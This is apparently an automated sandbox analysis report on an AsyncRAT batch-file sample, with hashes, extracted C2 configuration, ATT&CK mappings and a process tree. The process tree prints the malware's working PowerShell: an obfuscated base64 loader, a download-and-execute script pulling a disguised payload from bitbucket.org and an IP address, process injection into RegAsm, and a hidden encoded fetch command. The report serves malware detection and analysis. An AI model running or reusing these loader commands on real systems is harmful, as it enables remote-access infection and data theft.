asyncrat | 88cb5593f2e66f223ed0993c90ec0709fc7166ff6c8659e33b84c24f6f5387a9

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-12-2024 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4753694444c734517db1798354d6757e.bat
Size

14KB
MD5

4753694444c734517db1798354d6757e
SHA1

69a983a9a46a68e0e716cb2455cc0c476b962d30
SHA256

88cb5593f2e66f223ed0993c90ec0709fc7166ff6c8659e33b84c24f6f5387a9
SHA512

4ff0358b264757dd5182fef9b199ab3850f130fb8455e4bbb607956630c2066c66df93f7f96023a9c4acef133d4ad68f09236272fcd814b604fbf646d7f76cce
SSDEEP

192:b86KQd3z8g+F+5lhVbeTymbPppbm/NbqHvRZqoi10OWjKRw1BiqvQ5OdvyyVEuNH:bjBoJqlkP7jqVqR8FWmgvWGUWZ

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

103.125.189.155:8848

Mutex

DcRatMutex_6565

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	3436	powershell.exe
10	3436	powershell.exe
18	3436	powershell.exe
21	4400	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3436	powershell.exe
2184	powershell.exe
4400	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4753694444c734517db1798354d6757e.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4753694444c734517db1798354d6757e.bat	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	bitbucket.org
8	bitbucket.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3436 set thread context of 408	3436	powershell.exe	89

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1592	WINWORD.EXE
1592	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2184	powershell.exe
2184	powershell.exe
3436	powershell.exe
3436	powershell.exe
4400	powershell.exe
4400	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3148	WMIC.exe
Token: SeSecurityPrivilege	3148	WMIC.exe
Token: SeTakeOwnershipPrivilege	3148	WMIC.exe
Token: SeLoadDriverPrivilege	3148	WMIC.exe
Token: SeSystemProfilePrivilege	3148	WMIC.exe
Token: SeSystemtimePrivilege	3148	WMIC.exe
Token: SeProfSingleProcessPrivilege	3148	WMIC.exe
Token: SeIncBasePriorityPrivilege	3148	WMIC.exe
Token: SeCreatePagefilePrivilege	3148	WMIC.exe
Token: SeBackupPrivilege	3148	WMIC.exe
Token: SeRestorePrivilege	3148	WMIC.exe
Token: SeShutdownPrivilege	3148	WMIC.exe
Token: SeDebugPrivilege	3148	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3148	WMIC.exe
Token: SeRemoteShutdownPrivilege	3148	WMIC.exe
Token: SeUndockPrivilege	3148	WMIC.exe
Token: SeManageVolumePrivilege	3148	WMIC.exe
Token: 33	3148	WMIC.exe
Token: 34	3148	WMIC.exe
Token: 35	3148	WMIC.exe
Token: 36	3148	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3148	WMIC.exe
Token: SeSecurityPrivilege	3148	WMIC.exe
Token: SeTakeOwnershipPrivilege	3148	WMIC.exe
Token: SeLoadDriverPrivilege	3148	WMIC.exe
Token: SeSystemProfilePrivilege	3148	WMIC.exe
Token: SeSystemtimePrivilege	3148	WMIC.exe
Token: SeProfSingleProcessPrivilege	3148	WMIC.exe
Token: SeIncBasePriorityPrivilege	3148	WMIC.exe
Token: SeCreatePagefilePrivilege	3148	WMIC.exe
Token: SeBackupPrivilege	3148	WMIC.exe
Token: SeRestorePrivilege	3148	WMIC.exe
Token: SeShutdownPrivilege	3148	WMIC.exe
Token: SeDebugPrivilege	3148	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3148	WMIC.exe
Token: SeRemoteShutdownPrivilege	3148	WMIC.exe
Token: SeUndockPrivilege	3148	WMIC.exe
Token: SeManageVolumePrivilege	3148	WMIC.exe
Token: 33	3148	WMIC.exe
Token: 34	3148	WMIC.exe
Token: 35	3148	WMIC.exe
Token: 36	3148	WMIC.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	408	RegAsm.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1592	WINWORD.EXE
1592	WINWORD.EXE
1592	WINWORD.EXE
1592	WINWORD.EXE
1592	WINWORD.EXE
1592	WINWORD.EXE
1592	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4228 wrote to memory of 3148	4228	cmd.exe	84
PID 4228 wrote to memory of 3148	4228	cmd.exe	84
PID 4228 wrote to memory of 4852	4228	cmd.exe	85
PID 4228 wrote to memory of 4852	4228	cmd.exe	85
PID 4228 wrote to memory of 2184	4228	cmd.exe	87
PID 4228 wrote to memory of 2184	4228	cmd.exe	87
PID 2184 wrote to memory of 3436	2184	powershell.exe	88
PID 2184 wrote to memory of 3436	2184	powershell.exe	88
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 3436 wrote to memory of 408	3436	powershell.exe	89
PID 4228 wrote to memory of 4400	4228	cmd.exe	90
PID 4228 wrote to memory of 4400	4228	cmd.exe	90
PID 4400 wrote to memory of 1592	4400	powershell.exe	92
PID 4400 wrote to memory of 1592	4400	powershell.exe	92

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4753694444c734517db1798354d6757e.bat"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4228
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3148
- C:\Windows\system32\find.exe
  find "QEMU"
  2⤵
  PID:4852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$Gk$RgBo$G0$bQBm$Gs$Lw$y$DY$Lg$y$D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.iFhmmfk/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:1592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD5.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwr5d24l.fkm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
249B

MD5
18f70ce13b8353bb3d2ca3ccf5e5e01a

SHA1
10796aff420747bcd5d9b7ff2f75e1a78729ecc8

SHA256
ce3c57748e11d9883d8f69a227512a452d158f18d377c98d8cd5b84a1cae5e69

SHA512
4d77d720ff82bbbf97cbb1fc4f16fee83abb9cdcba392736b7dfa40f59d5eadf2b02f8c7a55179a01b8f7d53e3f2370c9848b5534a9da5f27d7f1d02e82b0929

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
681B

MD5
767780480eb1ce3cab03fb7749d8adf9

SHA1
391f16d96df8515628cc88b81064fab97c888988

SHA256
4bdc3f77f77770474fc0c906a4e71be053cf221e6848b9d7b5feff4fca1b5f03

SHA512
a726c9a2f7fd8d151701a1b0246fb4573373efd79e1bead2fb4f356408979aa54caa637889a2b0baff834aa22b555b1878337008e08e5350e40f841f6bf42099

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
fe40c1dd3aff8bcaa314009490ecf02a

SHA1
080bd773e6e44843ed557e07bc9c806e0b83c070

SHA256
04c81c2d645a8df4881e70f513191143ecf4edb60fd25259c3285d2aa27505f9

SHA512
bd02eeabb0d109aea4f6ec5030a1a7961cb4a185c8f07ec773b5d9dc0f39137d58f1fa499aa74359eef1bf5e01254683ccb11e39e5031b398ef15058d9670179

Download Submit
C:\Users\Admin\AppData\Roaming\donhang.docx

Filesize
12KB

MD5
ff3620557b65e6e8dd8816643d785c5a

SHA1
d5021480b7cac2066462829c53dc18615642c579

SHA256
85225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9

SHA512
c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34

Download Submit
memory/408-83-0x0000000005BD0000-0x0000000005C36000-memory.dmp

Filesize
408KB

Download
memory/408-82-0x0000000006110000-0x00000000066B4000-memory.dmp

Filesize
5.6MB

Download
memory/408-81-0x0000000005AC0000-0x0000000005B5C000-memory.dmp

Filesize
624KB

Download
memory/408-26-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1592-53-0x00007FF802A50000-0x00007FF802A60000-memory.dmp

Filesize
64KB

Download
memory/1592-52-0x00007FF802A50000-0x00007FF802A60000-memory.dmp

Filesize
64KB

Download
memory/1592-54-0x00007FF802A50000-0x00007FF802A60000-memory.dmp

Filesize
64KB

Download
memory/1592-51-0x00007FF802A50000-0x00007FF802A60000-memory.dmp

Filesize
64KB

Download
memory/1592-55-0x00007FF802A50000-0x00007FF802A60000-memory.dmp

Filesize
64KB

Download
memory/1592-56-0x00007FF800760000-0x00007FF800770000-memory.dmp

Filesize
64KB

Download
memory/1592-57-0x00007FF800760000-0x00007FF800770000-memory.dmp

Filesize
64KB

Download
memory/2184-12-0x00007FF8242B0000-0x00007FF824D71000-memory.dmp

Filesize
10.8MB

Download
memory/2184-0-0x00007FF8242B3000-0x00007FF8242B5000-memory.dmp

Filesize
8KB

Download
memory/2184-33-0x00007FF8242B0000-0x00007FF824D71000-memory.dmp

Filesize
10.8MB

Download
memory/2184-7-0x0000029CEA550000-0x0000029CEA572000-memory.dmp

Filesize
136KB

Download
memory/2184-11-0x00007FF8242B0000-0x00007FF824D71000-memory.dmp

Filesize
10.8MB

Download
memory/3436-29-0x00007FF8242B0000-0x00007FF824D71000-memory.dmp

Filesize
10.8MB

Download
memory/3436-18-0x00007FF8242B0000-0x00007FF824D71000-memory.dmp

Filesize
10.8MB

Download
memory/3436-23-0x00007FF8242B0000-0x00007FF824D71000-memory.dmp

Filesize
10.8MB

Download
memory/3436-24-0x00007FF8242B0000-0x00007FF824D71000-memory.dmp

Filesize
10.8MB

Download
memory/3436-25-0x000001CDADDF0000-0x000001CDADE00000-memory.dmp

Filesize
64KB

Download